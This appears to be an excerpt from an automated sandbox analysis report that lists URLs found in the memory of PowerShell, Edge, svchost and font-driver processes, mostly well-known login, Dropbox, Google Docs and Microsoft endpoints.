                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD83FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B0005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD85F6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                    Source: msedge.exe, 00000005.00000002.2232022623.00000241492A5000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2409707632.00000221846AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                    Source: msedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: msedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: msedge.exe, 00000005.00000002.2232668987.00003C1000024000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2411623205.00001C4C00040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: fontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                    Source: fontdrvhost.exe, 00000019.00000003.2682858295.000000000534B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                    Source: svchost.exe, 00000006.00000003.2227435676.0000018A79233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000006.00000003.2227435676.0000018A791C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD8477C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD85450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                    Source: msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                    Source: msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                    Source: powershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 00000005.00000002.2233560389.00003C1000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412990781.00001C4C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
